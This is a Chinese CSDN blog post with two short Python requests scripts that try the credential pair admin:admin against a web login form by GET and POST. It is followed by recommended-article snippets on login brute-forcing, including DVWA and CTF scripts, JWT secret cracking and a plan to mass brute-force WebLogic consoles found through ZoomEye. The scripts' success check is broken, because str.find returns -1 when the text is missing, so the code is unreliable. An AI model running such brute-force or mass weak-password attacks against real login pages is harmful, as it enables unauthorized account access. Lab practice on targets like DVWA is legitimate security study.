通过python写脚本简单爆破web页面登陆

最新推荐文章于 2023-03-22 11:37:23 发布
最新推荐文章于 2023-03-22 11:37:23 发布
阅读量972 收藏 5
点赞数 2
分类专栏: python编程 文章标签: python post url
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/p_utao/article/details/113246345
版权

GET传参

import requests

url = ""
payload = {'username':'admin','password':'admin','submit':'登陆'}

r = requests.get(url,params=payload)
result = r.content
if str(result).find('成功'):
    print("admin:admin")

POST传参

import requests

url = ""
data = {'username':'admin','password':'admin','submit':'登陆'}

r = requests.post(url,params=data)
if r.text.find('成功'):
    print("admin:admin")
p_utao
关注
  • 2
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python网站登录爆破登录_看我如何爆破加密的web登录表单
weixin_39915078的博客
12-17 660
有很多方法来爆破登录表单,你只需要 google 一下就可以在搜索的结果中看到一些通常的做法。在你使用 Burp 的情况下,这些搜索出来的爆破方式将足以满足大多数的形式爆破。但有时候,爆破不会那么简单,你需要编自己的工具。这可能是因为一些各种原因所致,但通常它归结为通过 HTTP(S)的自定义协议或输入的数据的是一些自定义的加密算法。在这篇文章中,我们将介绍两种编这些工具的方法:1. 编你自...
使用python验证码识别来爆破网站后台
chaootis1的博客
01-19 5203
使用python验证码识别来爆破网站后台 在我的上一篇博客中,讲解了我用python来识别验证码的原理,对于有些人来说,他可能并不想知道验证码识别的原理,只是想寻找方法去识别验证码从而使用脚本登录网站或者爆破网站的密码。 这几天我把我之前的代码重了一下(之前的真的很乱,一般人都看不下去),现在只需要改一下配置文件,你就可以定制自己的目标网站的验证码识别。 1. 运行环境为python3
只用20行Python代码就攻破了网站登录
公众号:Python研究者
03-12 1825
大家好,我是辰哥~今天教大家用Python代码攻破网站登录(在测试靶机上进行实验),原理上是抓包和改包,如果学过的爬虫的话,相信你会快看懂这篇文章测试靶机为DVWA,适合DVWA暴力破解模...
python爆破定长密码脚本
baikeng3674的博客
02-04 154
def get_pwd(str, num):#str为可选字符集,num为密码长度 if(num == 1): for x in str: yield x else: for x in str: for y in get_pwd(str, num...
Python 爆破web登录实验笔记
m0_60823533的博客
05-15 1145
总体原理:多次发送密码尝试穷举爆破 具体流程分析: 1.抓取web发送账号密码数据接口 2.自动识别验证码 3.获取到密码和验证码结果,通过python模拟无限次发送 4.分析返回结果 详细流程: (1).抓取web发送账号密码数据接口 网站登录界面示例: 通过抓取提交数据接口发现有用户名,密码,验证码三个数据,这里需要分析第三个数据怎么获取,直接打开云代码查看,看到了获取验证码的接口! 但是经过测试始终提示验证码错误,又回来分析验证码接口,终于反复查看发现这
python之——使用python爆破脚本
12-21
此处以dvwa网站的密码爆破为例 #coding:utf-8 """ dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url="http://localhost/DVWA-master/vulnerabilities/brute/" req=urllib2.Request(url,headers={"Cookie":"security=high;PHP
python批量weblogic爆破脚本
weixin_30342827的博客
07-11 415
前言: 整理笔记的时候,发现了weblogic的攻击方法。心里打着算盘看看怎么 个批量的弱口令爆破脚本。得出了以下思路 思路: 1.利用钟馗之眼采集weblogic的网站,将IP入到txt 2.添加后台路径,判断是否能成功连接,并且没有过滤表里面的错误。入到txt 3.转换路径,将后台路径转换为表单请求的路径入到txt 4.判断是账号和密码是否成功 详细思路请参考:h...
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web185 正则爆破脚本
10-21
ctfshow web185 正则爆破脚本,以true拼接形成数字,实现ascii代替数字、字母和特殊符号
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
网页密码暴力破解模板,多线程-python
09-05
网页密码暴力破解模板,用python2编,多线程,可自己调节线程,只是一个模板,需要自己修改里面的关键字,内容等。
ctfshow web240 insert 爆破表名
10-21
ctfshow web240 insert 爆破表名
巧用python和libnmapd,提取Nmap扫描结果
12-24
我在渗透测试中也会经常使用到 IPthon 或 *nix shell,而这些又都能够通过 Python 来访问,无论是直接在脚本中使用、在 REPL 环境下使用,还是将代码入到磁盘上然后通过 shell 命令访问都是非常好用的。...
Web攻击Python
watermelon
08-20 305
Web攻击 常见的Web攻击 XSS、SQL注入、DDOS、CSRF XSS 什么是XSS攻击? XSS攻击:跨站脚本攻击,允许攻击者将恶意代码植入到其它用户使用的页面中,涉及到三方:攻击者、客户端、web应用。 主要目的: 盗取存储在cookie,获取cookie之后假冒用户与网站进行交互。 XSS分类(存储型、反射型) 1、存储型XSS:主要出现在让用户输入数据,供其他浏览此页的用户进行查看的...
pythonWEB登录密码暴力破解
HTTP协议01
05-06 7508
原理:利用字典爆破进行破解 实验环境:本机Win10(python3.7环境)、虚拟机Win2003(搭建DVWA网站) 工具:火狐浏览器、Burp Suite 实现步骤: 1、获取正常登录时需要提交的数据信息。 Burp Suite开启抓包,浏览器范文Dvwa登录页面,按F12开启网络数据查看器,登录dvwa. 可知:username、passwo...
CTF—Python爬虫-WEB目录爆破和指纹识别
weixin_52620919的博客
08-06 1742
自己的web目录爆破脚本。 首先我们要准备一个字典,用来爆破web目录,而且为了使扫描效果好一点,这个字典里面的内容几乎都是dedecms可能的目录。 其实要实现这个功能,原理很简单,只用读取字典文件中的每一项,与访问的url拼接成一个新的url,并对这个新的url发送GET请求,选出状态码为200的url,就是网站可以访问的url。当然为了使扫描的速度尽可能的快一些,还要使用多线程。 主要功能代码如下: 线程的使用: 同时,为了防止网站有防爬机制,对UA进行了校验,也为了防止使用同一个UA进行多
python3登录爆破脚本
deng_menglihua的博客
09-17 2763
登录爆破脚本 以下地址是我自己的DVWA靶场的地址,欢迎大家交流学习。 1.post型登录框爆破脚本 import requests s='0123456789' url="http://10.16.102.162/DVWA/vulnerabilities/brute/?" m=0 n=1 username=input("请输入用户名") data2={'username':username,'password':00000,'Login':'Login'} headers={'cookie':'secur
前端安全问题——暴破登录
Jack, what else can you do besides holding your little darling?
03-22 2198
声明:本文仅供学习和研究用途,请勿用作违法犯罪之事,若违反则与本人无关。暴力破解登录是一种常见的前端安全问题,属于未授权访问安全问题的一种,攻击者尝试使用不同的用户名和密码组合来登录到受害者的账户,直到找到正确的用户名和密码组合为止。攻击者可以使用自动化工具,如字典攻击、暴力攻击等来加快攻击速度。这种攻击通常针对用户使用弱密码、没有启用多因素身份验证等情况。
使用python简单的目录扫描
p_utao的博客
10-07 1190
地址: http://www.miaosj.cn/ 思路: """ 通过分析判断网页返回的状态码来表明目录是否存在 1.访问网页 2.查看状态码 3.判断网页是否存在 """ 代码: import requests url = "http://www.miaosj.cn/" headers = { "User-Agent": "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko)
Python一个jwt爆破脚本
最新发布
07-25
下面是一个使用Python的JWT爆破脚本的示例: ```python import jwt def brute_force_jwt(secret_key, token): # 生成payload字典,可以根据需要修改 payload = {'username': 'admin'} # 尝试不同的密钥...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值